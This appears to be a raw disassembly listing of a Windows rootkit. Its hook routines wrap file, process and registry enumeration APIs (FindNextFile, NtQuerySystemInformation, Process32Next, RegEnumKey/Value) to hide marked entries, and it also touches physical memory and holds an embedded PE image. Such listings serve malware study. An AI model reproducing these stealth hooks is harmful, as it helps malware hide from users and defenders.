dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401F0E
dd offset loc_401F20
dd offset loc_401F0E
dd offset loc_401F0E
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
off_43C4FC dd offset loc_401DBB ; DATA XREF: sub_401D31+291�r
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401F37
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401F4A
dd offset loc_401F4A
dd offset loc_401F4A
dd offset loc_401F4A
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401E1C
dd offset loc_401F5A
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F0E
dd offset loc_401F0E
dd offset loc_401F70
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401F0E
dd offset loc_401F20
dd offset loc_401F7C
dd offset loc_402002
dd offset loc_401F70
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DCD
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401DBB
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401E1C
dd offset loc_401F5A
dd offset loc_401F5A
dd offset loc_401F37
dd offset loc_401E1C
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401E58
dd offset loc_401F85
dd offset loc_401E85
dd offset loc_401E85
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DE8
dd offset loc_401DE8
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401DBB
dd offset loc_401DBB
off_43C6CC dd offset loc_401FCE ; DATA XREF: sub_401D31+27C�r
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_402002
dd offset loc_401FFB
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FDF
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401FCE
dd offset loc_401FEC
dd offset loc_401FCE
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_401FCE
dd offset loc_401FEC
dd offset loc_401FCE
dd offset loc_401FFB
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_401FEC
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FCE
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_401FFB
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
dd offset loc_402002
aFindnextfilea db 'FindNextFileA',0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43C85B: ; CODE XREF: .data:0043C8A4�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CA68h
test eax, eax
jz short loc_43C8A6
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43C875: ; CODE XREF: .data:0043C87B�j
cmp byte ptr [ebx], 0
jz short loc_43C87D
inc ebx
jmp short loc_43C875
; ---------------------------------------------------------------------------
loc_43C87D: ; CODE XREF: .data:0043C878�j
mov word ptr [ebx], 463Ah
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD49Eh
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43C8A3
popa
jmp short loc_43C8A6
; ---------------------------------------------------------------------------
loc_43C8A3: ; CODE XREF: .data:0043C89E�j
popa
jmp short loc_43C85B
; ---------------------------------------------------------------------------
loc_43C8A6: ; CODE XREF: .data:0043C868�j
; .data:0043C8A1�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 6E694600h, 78654E64h, 6C694674h
db 65h, 57h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43C8DC: ; CODE XREF: .data:0043C92B�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CAE9h
test eax, eax
jz short loc_43C92D
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43C8F6: ; CODE XREF: .data:0043C8FE�j
cmp word ptr [ebx], 0
jz short loc_43C900
inc ebx
inc ebx
jmp short loc_43C8F6
; ---------------------------------------------------------------------------
loc_43C900: ; CODE XREF: .data:0043C8FA�j
mov dword ptr [ebx], 46003Ah
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D625h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43C92A
popa
jmp short loc_43C92D
; ---------------------------------------------------------------------------
loc_43C92A: ; CODE XREF: .data:0043C925�j
popa
jmp short loc_43C8DC
; ---------------------------------------------------------------------------
loc_43C92D: ; CODE XREF: .data:0043C8E9�j
; .data:0043C928�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
dw 0FFFFh
dword_43C940 dd 0FFFFFFh, 7551744Eh, 53797265h, 65747379h, 666E496Dh
; DATA XREF: .data:0043CE8C�o
dd 616D726Fh, 6E6F6974h
db 0
; ---------------------------------------------------------------------------
loc_43C95D: ; DATA XREF: .data:0043CE94�o
push ebp
mov ebp, esp
sub esp, 24h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
sub esp, 10h
mov eax, [ebp+14h]
mov edi, [ebp+10h]
mov ebx, [ebp+0Ch]
mov [esp+0Ch], eax
mov [esp+8], edi
mov [esp+4], ebx
mov esi, [ebp+8]
mov [esp], esi
call near ptr 245CB93h
mov [ebp-4], eax
cmp esi, 5
jz short loc_43C9AD
loc_43C999: ; CODE XREF: .data:0043C9B3�j
; .data:0043CA06�j
mov eax, [ebp-4]
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_43C9AD: ; CODE XREF: .data:0043C997�j
cmp edi, 1F40h
jle short loc_43C999
jmp short loc_43C9BB
; ---------------------------------------------------------------------------
loc_43C9B7: ; CODE XREF: .data:0043CA08�j
mov esi, ebx
loc_43C9B9: ; CODE XREF: .data:0043CA00�j
add ebx, eax
loc_43C9BB: ; CODE XREF: .data:0043C9B5�j
pusha
mov eax, [ebx+44h]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43C9C9: ; CODE XREF: .data:0043C9DC�j
bt eax, ebx
jb short loc_43C9D4
mov byte ptr [esp+ebx], 30h
jmp short loc_43C9D8
; ---------------------------------------------------------------------------
loc_43C9D4: ; CODE XREF: .data:0043C9CC�j
mov byte ptr [esp+ebx], 31h
loc_43C9D8: ; CODE XREF: .data:0043C9D2�j
inc ebx
cmp ebx, 20h
jnz short loc_43C9C9
push esp
call near ptr 0C4FD5F0h
add esp, 24h
test ax, ax
jnz short loc_43C9EF
popa
jmp short loc_43CA02
; ---------------------------------------------------------------------------
loc_43C9EF: ; CODE XREF: .data:0043C9EA�j
popa
mov eax, [ebx]
test eax, eax
jnz short loc_43C9FE
mov dword ptr [esi], 0
jmp short loc_43CA02
; ---------------------------------------------------------------------------
loc_43C9FE: ; CODE XREF: .data:0043C9F4�j
add [esi], eax
jmp short loc_43C9B9
; ---------------------------------------------------------------------------
loc_43CA02: ; CODE XREF: .data:0043C9ED�j
; .data:0043C9FC�j
mov eax, [ebx]
test eax, eax
jz short loc_43C999
jmp short loc_43C9B7
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 0FFFFFFh
aProcess32next db 'Process32Next',0 ; DATA XREF: .data:off_43CE7C�o
word_43CA1E dw 8360h ; DATA XREF: .data:off_43CE84�o
dd 46A08C5h, 0B0BE855h, 0C0850B0Bh, 0EB610374h, 458B610Bh
dd 1013D08h, 14740101h, 80808E8h, 1FF8108h, 74010101h
dd 1013D07h, 5750101h, 20202E9h
db 2
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43CA66: ; CODE XREF: .data:0043CAB4�j
sub esp, 8
mov ebx, [ebp+0Ch]
mov edi, [ebp+8]
mov [esp+4], ebx
mov [esp], edi
call near ptr 245CC7Dh
test eax, eax
jz short loc_43CAB6
pusha
mov eax, [ebx+8]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43CA8D: ; CODE XREF: .data:0043CAA0�j
bt eax, ebx
jb short loc_43CA98
mov byte ptr [esp+ebx], 30h
jmp short loc_43CA9C
; ---------------------------------------------------------------------------
loc_43CA98: ; CODE XREF: .data:0043CA90�j
mov byte ptr [esp+ebx], 31h
loc_43CA9C: ; CODE XREF: .data:0043CA96�j
inc ebx
cmp ebx, 20h
jnz short loc_43CA8D
push esp
call near ptr 0C4FD6B4h
add esp, 24h
test ax, ax
jnz short loc_43CAB3
popa
jmp short loc_43CAB6
; ---------------------------------------------------------------------------
loc_43CAB3: ; CODE XREF: .data:0043CAAE�j
popa
jmp short loc_43CA66
; ---------------------------------------------------------------------------
loc_43CAB6: ; CODE XREF: .data:0043CA7D�j
; .data:0043CAB1�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 4179654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CADC: ; CODE XREF: .data:0043CB29�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CCEFh
test eax, eax
jnz short loc_43CB2B
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CAF7: ; CODE XREF: .data:0043CAFD�j
cmp byte ptr [ebx], 0
jz short loc_43CAFF
inc ebx
jmp short loc_43CAF7
; ---------------------------------------------------------------------------
loc_43CAFF: ; CODE XREF: .data:0043CAFA�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD720h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CB25
popa
jmp short loc_43CB2B
; ---------------------------------------------------------------------------
loc_43CB25: ; CODE XREF: .data:0043CB20�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43CADC
; ---------------------------------------------------------------------------
loc_43CB2B: ; CODE XREF: .data:0043CAEF�j
; .data:0043CB23�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 5779654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CB44: ; CODE XREF: .data:0043CB97�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CD57h
test eax, eax
jnz short loc_43CB99
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CB5F: ; CODE XREF: .data:0043CB67�j
cmp word ptr [ebx], 0
jz short loc_43CB69
inc ebx
inc ebx
jmp short loc_43CB5F
; ---------------------------------------------------------------------------
loc_43CB69: ; CODE XREF: .data:0043CB63�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D88Eh
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CB93
popa
jmp short loc_43CB99
; ---------------------------------------------------------------------------
loc_43CB93: ; CODE XREF: .data:0043CB8E�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43CB44
; ---------------------------------------------------------------------------
loc_43CB99: ; CODE XREF: .data:0043CB57�j
; .data:0043CB91�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dword_43CBA0 dd 5200FFFFh, 6E456765h, 654B6D75h, 57784579h db 0
; ---------------------------------------------------------------------------
loc_43CBB1: ; DATA XREF: .data:0043CEE4�o
push ebp
mov ebp, esp
loc_43CBB4: ; CODE XREF: .data:0043CC2F�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CBC2
push dword ptr [eax]
loc_43CBC2: ; CODE XREF: .data:0043CBBE�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CDE1h
test eax, eax
jnz short loc_43CC31
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CBE9: ; CODE XREF: .data:0043CBF1�j
cmp word ptr [ebx], 0
jz short loc_43CBF3
inc ebx
inc ebx
jmp short loc_43CBE9
; ---------------------------------------------------------------------------
loc_43CBF3: ; CODE XREF: .data:0043CBED�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D918h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CC1D
popa
jmp short loc_43CC31
; ---------------------------------------------------------------------------
loc_43CC1D: ; CODE XREF: .data:0043CC18�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CC2A
pop dword ptr [eax]
loc_43CC2A: ; CODE XREF: .data:0043CC26�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CBB4
; ---------------------------------------------------------------------------
loc_43CC31: ; CODE XREF: .data:0043CBE1�j
; .data:0043CC1B�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43CC3D
add esp, 4
loc_43CC3D: ; CODE XREF: .data:0043CC38�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dd 5200FFFFh, 6E456765h, 654B6D75h, 41784579h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CC58: ; CODE XREF: .data:0043CCCD�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CC66
push dword ptr [eax]
loc_43CC66: ; CODE XREF: .data:0043CC62�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CE85h
test eax, eax
jnz short loc_43CCCF
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CC8D: ; CODE XREF: .data:0043CC93�j
cmp byte ptr [ebx], 0
jz short loc_43CC95
inc ebx
jmp short loc_43CC8D
; ---------------------------------------------------------------------------
loc_43CC95: ; CODE XREF: .data:0043CC90�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD8B6h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CCBB
popa
jmp short loc_43CCCF
; ---------------------------------------------------------------------------
loc_43CCBB: ; CODE XREF: .data:0043CCB6�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CCC8
pop dword ptr [eax]
loc_43CCC8: ; CODE XREF: .data:0043CCC4�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CC58
; ---------------------------------------------------------------------------
loc_43CCCF: ; CODE XREF: .data:0043CC85�j
; .data:0043CCB9�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43CCDB
add esp, 4
loc_43CCDB: ; CODE XREF: .data:0043CCD6�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dword_43CCE0 dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h db 65h, 57h, 0
; ---------------------------------------------------------------------------
loc_43CCF3: ; DATA XREF: .data:0043CF04�o
push ebp
mov ebp, esp
loc_43CCF6: ; CODE XREF: .data:0043CD71�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CD04
push dword ptr [eax]
loc_43CD04: ; CODE XREF: .data:0043CD00�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CF23h
test eax, eax
jnz short loc_43CD73
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CD2B: ; CODE XREF: .data:0043CD33�j
cmp word ptr [ebx], 0
jz short loc_43CD35
inc ebx
inc ebx
jmp short loc_43CD2B
; ---------------------------------------------------------------------------
loc_43CD35: ; CODE XREF: .data:0043CD2F�j
mov dword ptr [ebx], 560023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50DA5Ah
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CD5F
popa
jmp short loc_43CD73
; ---------------------------------------------------------------------------
loc_43CD5F: ; CODE XREF: .data:0043CD5A�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CD6C
pop dword ptr [eax]
loc_43CD6C: ; CODE XREF: .data:0043CD68�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CCF6
; ---------------------------------------------------------------------------
loc_43CD73: ; CODE XREF: .data:0043CD23�j
; .data:0043CD5D�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43CD7F
add esp, 4
loc_43CD7F: ; CODE XREF: .data:0043CD7A�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h
db 65h, 41h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CD9A: ; CODE XREF: .data:0043CE0F�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CDA8
push dword ptr [eax]
loc_43CDA8: ; CODE XREF: .data:0043CDA4�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CFC7h
test eax, eax
jnz short loc_43CE11
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CDCF: ; CODE XREF: .data:0043CDD5�j
cmp byte ptr [ebx], 0
jz short loc_43CDD7
inc ebx
jmp short loc_43CDCF
; ---------------------------------------------------------------------------
loc_43CDD7: ; CODE XREF: .data:0043CDD2�j
mov word ptr [ebx], 5623h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD9F8h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CDFD
popa
jmp short loc_43CE11
; ---------------------------------------------------------------------------
loc_43CDFD: ; CODE XREF: .data:0043CDF8�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CE0A
pop dword ptr [eax]
loc_43CE0A: ; CODE XREF: .data:0043CE06�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CD9A
; ---------------------------------------------------------------------------
loc_43CE11: ; CODE XREF: .data:0043CDC7�j
; .data:0043CDFB�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43CE1D
add esp, 4
loc_43CE1D: ; CODE XREF: .data:0043CE18�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
db 2 dup(0FFh), 0
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_402A48+3F5�o
; .data:off_43CE80�o
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_402226+E�o
; .data:0043CE90�o ...
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: .data:0043CEE0�o
; .data:0043CF00�o
aIphlpapi_dll db 'iphlpapi.dll',0
aInetmib1_dll db 'inetmib1.dll',0
aWsock32_dll db 'wsock32.dll',0
aUser32_dll db 'user32.dll',0
off_43CE7C dd offset aProcess32next ; DATA XREF: sub_402A48+BA�r
; sub_402A48+ED�r ...
; "Process32Next"
off_43CE80 dd offset aKernel32_dll ; DATA XREF: sub_402A48+9B�r
; "kernel32.dll"
off_43CE84 dd offset word_43CA1E ; DATA XREF: sub_402843+1F1�r
byte_43CE88 db 0 ; DATA XREF: sub_402A48+66�r
; sub_402A48+83�r
align 4
dd offset dword_43C940+4
dd offset aNtdll_dll ; "ntdll.dll"
dd offset loc_43C95D
dd 1, 43C8BDh, 43CE27h, 43C8CBh, 1, 43C83Ch, 43CE27h, 43C84Ah
dd 2, 43CB35h, 43CE3Eh, 43CB41h, 1, 43CACDh, 43CE3Eh, 43CAD9h
dd 0
dd offset dword_43CBA0+3
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43CBB1
dd 1, 43CC47h, 43CE3Eh, 43CC55h, 0
dd offset dword_43CCE0+5
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43CCF3
dd 1, 43CD89h, 43CE3Eh, 43CD97h, 5 dup(0)
dd 1
dword_43CF30 dd 0Ah dword_43CF34 dd 0 ; .text:loc_4021C8�r ...
aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_402226+25�o
db '^H',0
aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_402226+3A�o
db 7Ah, 57h, 34h
dd 7F3640h
aNtopensection db 'NtOpenSection',0 ; DATA XREF: sub_402226+4A�o
aBc db ':Bc',0
aNtmapviewofsec db 'NtMapViewOfSection',0 ; DATA XREF: sub_402226+65�o
align 2
aRtlntstatustod db 'RtlNtStatusToDosError',0 ; DATA XREF: sub_402226+75�o
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_4022BB+95�o
align 4
aDevicePhysical: ; DATA XREF: sub_4022BB+E�o
unicode 0, <\device\physicalmemory>,0
byte_43CFE6 db 0 ; DATA XREF: sub_4022BB+5E�o
dword_43CFE7 dd 465420h byte_43CFEB db 0 ; DATA XREF: sub_4022BB+A1�o
dword_43CFEC dd 248243h word_43CFF0 dw 66h ; DATA XREF: sub_4024A8+4�r
align 4
dword_43CFF4 dd 0 dword_43CFF8 dd 11h dword_43CFFC dd 0 ; .text:loc_4024EA�r ...
aWcscmp db 'wcscmp',0 ; DATA XREF: .data:off_43D094�o
aHtons db 'htons',0
aVirtualprotect db 'VirtualProtect',0
aNua db 'NU',0
aGetcurrentproc db 'GetCurrentProcessId',0
dd 6E694600h, 6E695764h, 41776F64h, 74306B00h, 3B6E704Dh
dd 6E655300h, 73654D64h, 65676173h, 3E530041h, 7349007Eh
dd 52646142h, 50646165h, 37007274h, 83382520h, 6C470065h
dd 6C61626Fh, 646E6946h, 6D6F7441h, 6C470041h, 6C61626Fh
dd 646E6946h, 6D6F7441h, 57h
byte_43D090 db 3 ; DATA XREF: sub_402563+87�r
align 4
off_43D094 dd offset aWcscmp ; DATA XREF: sub_402563+FB�r
; sub_402563+15E�r
; "wcscmp"
off_43D098 dd offset aNtdll_dll ; DATA XREF: sub_402563+E8�r
; "ntdll.dll"
dd 5, 43D007h, 43CE65h, 7, 43D00Dh, 43CE27h, 8, 43D020h
dd 43CE27h, 9, 43D035h, 43CE71h, 0Ah, 43D049h, 43CE71h
dd 0Bh, 43D05Ah, 43CE27h, 0Ch, 43D06Eh, 43CE27h, 0Dh, 43D07Eh
dd 43CE27h
aCcLN db 'CC$l+n',0 ; DATA XREF: sub_402563+C�o
word_43D103 dw 68h ; DATA XREF: sub_402563+14B�r
aTLd db 'T-+ld&',0 ; DATA XREF: sub_402563+1BD�o
a5anwhv db '5Nwhv',0 ; DATA XREF: sub_402843+3C�o
aZ db 'z ',0 ; DATA XREF: sub_402843+DF�o
aNiL db 'NI*l',0 ; DATA XREF: sub_402843+135�o
word_43D11B dw 62h ; DATA XREF: sub_402843+191�r
byte_43D11D db 6Ch, 75h, 0 ; DATA XREF: sub_402A48+3F�o
aOGdu db 'O$/gdu ',0 ; DATA XREF: sub_402A48+101�o
aE3 db '-;E3',0 ; DATA XREF: sub_402A48+40B�o
aZt_ db '!/zt_$',0 ; DATA XREF: sub_402A48+511�o
byte_43D134 db 0 ; DATA XREF: sub_403010+46�o
aZ_0 db ' Z',0 ; DATA XREF: sub_403010+216�o
dw 7
unicode 0, <>,0
dd 10h
dword_43D140 dd 0 ; sub_4032E2:loc_403308�r ...
aObxzqn@ db 'oxzqn@',0 ; DATA XREF: sub_403370+48�o
byte_43D14C db 0 ; DATA XREF: sub_403370+9E�o
word_43D14D dw 4Eh ; DATA XREF: sub_40341E+6C�r
word_43D14F dw 57h ; DATA XREF: sub_40349A+C�r
dword_43D151 dd 813B36h aJ95e db ' J95E',0 ; DATA XREF: sub_40349A+79�o
align 4
dword_43D15C dd 1 dd 0Ah
dword_43D164 dd 0 ; sub_40354F:loc_40357D�r ...
byte_43D168 db 5Eh, 48h, 0 ; DATA XREF: sub_4035DB+F�o
byte_43D16B db 7Ah ; DATA XREF: sub_4035DB+1F�o
dd 36403457h
db 7Fh, 0
aDmc9 db '!dmC9',0 ; DATA XREF: sub_4036BC+17�o
dd 0
dd 11h
dword_43D180 dd 0 ; sub_40372A:loc_403751�r ...
a9b7 db ':9b 7-',0 ; DATA XREF: .text:00403873�o
aUa db 'U',0 ; DATA XREF: .text:004038E9�o
align 10h
dd 6, 0Eh
dword_43D198 dd 0 ; sub_40390E:loc_403943�r ...
dword_43D19C dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0)
dd 80h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 4550h, 7014Ch, 427CB50Ah, 2 dup(0)
dd 210E00E0h, 3702010Bh, 800h, 0C00h, 1000h, 1190h, 1000h
